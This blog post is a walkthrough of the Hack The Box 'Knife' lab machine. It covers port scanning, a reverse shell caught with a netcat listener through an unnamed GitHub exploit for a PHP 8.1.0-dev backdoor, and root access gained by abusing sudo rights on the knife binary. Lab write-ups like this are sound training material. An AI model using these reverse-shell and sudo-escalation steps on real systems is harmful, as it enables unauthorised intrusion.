IT and security stuff

HTB – Knife Writeup

neoh  main  ~/HTB/knife  sudo nmap -sSCV -p- -T4 10.10.10.242 -oN nmap.md 
[sudo] password for neoh: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 21:10 EST
Nmap scan report for 10.10.10.242
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds

Nmap reveals ssh on port 22 and a website on port 80.

It took me a couple seconds to find a vulnerability on this website. In the response’s header we can see X-Powered-By PHP/8.1.0-dev

I found a nice exploit on GitHub that will provide a reverse shell. Let’s start a listener.

 neoh  main  ~  nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.242 52250
bash: cannot set terminal process group (969): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$ export TERM=xterm
export TERM=xterm
james@knife:/$

Time for escalation. Enumeration didn’t take long 😉

james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

This should be fairly easy!

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
# whoami
whoami
root

Done!!! Rooted!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.